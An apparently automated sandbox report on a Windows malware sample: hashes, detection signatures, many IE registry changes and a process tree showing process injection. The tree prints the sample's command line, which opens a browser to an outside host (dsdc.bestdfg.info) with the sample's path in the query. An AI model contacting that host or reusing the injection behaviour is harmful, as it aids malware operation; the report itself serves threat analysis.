21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255

Analysis

max time kernel
91s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
12/10/2022, 18:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
Size

115KB
MD5

6cbc8d0540491213d5ef8dcc1a26dfd1
SHA1

44296218117c4f650aac3354ce1271849cd57414
SHA256

21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255
SHA512

d8bcf3178048a151d66d53a4ca67f6f645fb3b553445de257f1592f3f87e2fa4f71e1d2d63c6e1136ae0ab6e2894b0c1d43695ef649603fe9c8c12bdaa2027ce
SSDEEP

3072:xqBFJLzgOJJzSja0fe+CUGXQV8HiKxh2pvFH:wPdZCXfvtGXQV8CyEfH

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe

Loads dropped DLL 13 IoCs

pid	Process
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4892 set thread context of 4276	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	124

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4249890059"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30989947"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3954276092"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3949888136"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000abeec101e4a82b3830da36ae2b95cc6e27c19b8ce80e2f8d429f816550d6808d000000000e8000000002000020000000c33af41a9b693328cfc690f48d924083641ce006b9b203a0142fa5b9cd265a9b20000000223892ef53a869ede54c31092c10401246d9299f50f5d49b73ff649c3cc226e9400000007ba330e735000b5fc831b95a35ce7cb59955494c517d03cfb6177afb3ab5d8818b06a35fcbf65f653e2e3594b1ccf81790d8d717d90872fb7388cee55e28eb89	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3025f4e07bded801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90a3a7db7bded801	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3954106492"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000a581c8eb5c27015acd5cbb1d0f9651b67be50655635108346a6e2fe9e94d529f000000000e800000000200002000000066a820311d27694704cecaf851131a7681355b535608a480a1bd37935e76a59920000000ff700bca12383e1af89b43d869d0a1ef8b91b50519a2f2f41b7c0b35f1f9ce73400000005e95854cc2223c21ad6095ab40149547e9797effbfe8898661ca09ad453b86c6b5454d146ec8ae76554fe65a04868692fca95d99c473a661d8eef1b2d24ee7cd	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30989947"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3977703302"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000cd34e6c538c07d21454f2bba999f67a9710409cb6d0cafd3c2d3fd92b4b47c71000000000e8000000002000020000000b907fa191b1648cdfcda4add0022a9461042ef09056fb5753b1fdcb844926143200000001d2f4fc4d91358961b39608b649bcacc1e9f06cea994cd50dc52ce5e55fd15914000000043b50988d0197c668acb94d3558fb84b01cc4d8bca8da1633fd66eae61efd9b583b2496fc802f358c3a343790be3e15248b2144f99d172ceb34a45469644f8f4	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989947"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 607b79e47bded801	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989947"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "372372625"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3949732197"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3954106492"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3954276092"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80f366e67bded801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989947"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d7906000000000200000000001066000000010000200000003c0b97ad69164039219a0fadc94f4eab54ef710220aa40456524a26c1d9ee4d6000000000e80000000020000200000009d3473dd9b96441050df85c4fd18531c21a5ab72f9d54d0f01e134f4be8b571d200000000355e4d825557b9b388cdf172e1dd10aac87275719a9e9404038b9e314c5419140000000a688ccec5e7679c908f4b6dae99d4da9d04a23ad50c8c232c2765e0e72a7a42ca93700d78b407ed411aa96f8f250e775cf9b267ee211334907fabcfc2df47ea4	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d7906000000000200000000001066000000010000200000003be77eb688d7c9841568a87031afb908a40ea004115d8e2829a2db7105f8167a000000000e8000000002000020000000764062748416cb9df70047512bdd1d725e63ee0cfe84e4bd6c47e5a66ccd0889200000007b4a100fa1b3e41c2616861c0a249e366c6b58af363dd80f80309fa5897aa0ae40000000c3131b98d6e56873bb851b8a1385cab922943678f674b13d83fc610704222f0b4f000eb905dc01f492b544232e13b9abcb7ede9aa72532ac993f1db11cdd3863	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d7906000000000200000000001066000000010000200000009d97c95b780d3b31413b950f2d416fcc18e443446222f77152b756a349409520000000000e800000000200002000000020321fd90cc08a377d762021f35b1c3876412887fb08c8232287fb313d5ebbd620000000ccfe51a36718e576cf21628de99433cb1759eeb9dede558047db9c8d8f55375340000000272c5fea62a87796c30a2fcc7ae0b02f857056dd2703b26d54ecffa4dbf2e690d8a4bc0dbfbf5fd01c75589f4ac1d4543c6ff60b99d8fd0f9c149123c4e1ea4b	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989947"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4066764442"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989947"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 808646dd7bded801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60a204ec7bded801	IEXPLORE.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4224	IEXPLORE.EXE

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
4820	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 50 IoCs

pid	Process
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4820	IEXPLORE.EXE
4820	IEXPLORE.EXE
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE
4648	IEXPLORE.EXE
4648	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
1420	IEXPLORE.EXE
1420	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4408	IEXPLORE.EXE
4408	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
1420	IEXPLORE.EXE
1420	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
3996	IEXPLORE.EXE
3996	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
3172	IEXPLORE.EXE
3172	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
4408	IEXPLORE.EXE
4408	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
5004	IEXPLORE.EXE
5004	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
3996	IEXPLORE.EXE
3996	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
3172	IEXPLORE.EXE
3172	IEXPLORE.EXE
4224	IEXPLORE.EXE
4224	IEXPLORE.EXE
1248	IEXPLORE.EXE
1248	IEXPLORE.EXE
1248	IEXPLORE.EXE
1248	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4892 wrote to memory of 1476	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	83
PID 4892 wrote to memory of 1476	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	83
PID 4892 wrote to memory of 1476	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	83
PID 1476 wrote to memory of 4224	1476	iexplore.exe	84
PID 1476 wrote to memory of 4224	1476	iexplore.exe	84
PID 4892 wrote to memory of 4744	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	85
PID 4892 wrote to memory of 4744	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	85
PID 4892 wrote to memory of 4744	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	85
PID 4744 wrote to memory of 4820	4744	iexplore.exe	86
PID 4744 wrote to memory of 4820	4744	iexplore.exe	86
PID 4224 wrote to memory of 1308	4224	IEXPLORE.EXE	89
PID 4224 wrote to memory of 1308	4224	IEXPLORE.EXE	89
PID 4224 wrote to memory of 1308	4224	IEXPLORE.EXE	89
PID 4820 wrote to memory of 4648	4820	IEXPLORE.EXE	88
PID 4820 wrote to memory of 4648	4820	IEXPLORE.EXE	88
PID 4820 wrote to memory of 4648	4820	IEXPLORE.EXE	88
PID 4892 wrote to memory of 3536	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	91
PID 4892 wrote to memory of 3536	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	91
PID 4892 wrote to memory of 3536	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	91
PID 3536 wrote to memory of 4908	3536	iexplore.exe	92
PID 3536 wrote to memory of 4908	3536	iexplore.exe	92
PID 4224 wrote to memory of 1420	4224	IEXPLORE.EXE	93
PID 4224 wrote to memory of 1420	4224	IEXPLORE.EXE	93
PID 4224 wrote to memory of 1420	4224	IEXPLORE.EXE	93
PID 4892 wrote to memory of 4284	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	97
PID 4892 wrote to memory of 4284	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	97
PID 4892 wrote to memory of 4284	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	97
PID 4284 wrote to memory of 4900	4284	iexplore.exe	98
PID 4284 wrote to memory of 4900	4284	iexplore.exe	98
PID 4224 wrote to memory of 4408	4224	IEXPLORE.EXE	99
PID 4224 wrote to memory of 4408	4224	IEXPLORE.EXE	99
PID 4224 wrote to memory of 4408	4224	IEXPLORE.EXE	99
PID 4892 wrote to memory of 3600	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	101
PID 4892 wrote to memory of 3600	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	101
PID 4892 wrote to memory of 3600	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	101
PID 3600 wrote to memory of 2792	3600	iexplore.exe	102
PID 3600 wrote to memory of 2792	3600	iexplore.exe	102
PID 4892 wrote to memory of 4632	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	105
PID 4892 wrote to memory of 4632	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	105
PID 4892 wrote to memory of 4632	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	105
PID 4632 wrote to memory of 1576	4632	iexplore.exe	106
PID 4632 wrote to memory of 1576	4632	iexplore.exe	106
PID 4224 wrote to memory of 3996	4224	IEXPLORE.EXE	107
PID 4224 wrote to memory of 3996	4224	IEXPLORE.EXE	107
PID 4224 wrote to memory of 3996	4224	IEXPLORE.EXE	107
PID 4892 wrote to memory of 308	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	108
PID 4892 wrote to memory of 308	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	108
PID 4892 wrote to memory of 308	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	108
PID 308 wrote to memory of 1484	308	iexplore.exe	109
PID 308 wrote to memory of 1484	308	iexplore.exe	109
PID 4224 wrote to memory of 3172	4224	IEXPLORE.EXE	110
PID 4224 wrote to memory of 3172	4224	IEXPLORE.EXE	110
PID 4224 wrote to memory of 3172	4224	IEXPLORE.EXE	110
PID 4892 wrote to memory of 1368	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	111
PID 4892 wrote to memory of 1368	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	111
PID 4892 wrote to memory of 1368	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	111
PID 1368 wrote to memory of 4112	1368	iexplore.exe	112
PID 1368 wrote to memory of 4112	1368	iexplore.exe	112
PID 4892 wrote to memory of 1248	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	113
PID 4892 wrote to memory of 1248	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	113
PID 4892 wrote to memory of 1248	4892	21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe	113
PID 1248 wrote to memory of 1000	1248	iexplore.exe	114
PID 1248 wrote to memory of 1000	1248	iexplore.exe	114
PID 4224 wrote to memory of 5004	4224	IEXPLORE.EXE	115

C:\Users\Admin\AppData\Local\Temp\21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe
"C:\Users\Admin\AppData\Local\Temp\21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4892
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=1012&i=ie&30a539e62fa58eceaaefc21b1bcfb96b776047af=30a539e62fa58eceaaefc21b1bcfb96b776047af&uu=C:\Users\Admin\AppData\Local\Temp\21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255&30a539e62fa58eceaaefc21b1bcfb96b776047af
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=1012&i=ie&30a539e62fa58eceaaefc21b1bcfb96b776047af=30a539e62fa58eceaaefc21b1bcfb96b776047af&uu=C:\Users\Admin\AppData\Local\Temp\21cbdc7ad8c16b6acf6ec8f3c687898edfc1aae2b5811dcf9faa3a671fca8255&30a539e62fa58eceaaefc21b1bcfb96b776047af
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4224 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1308
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
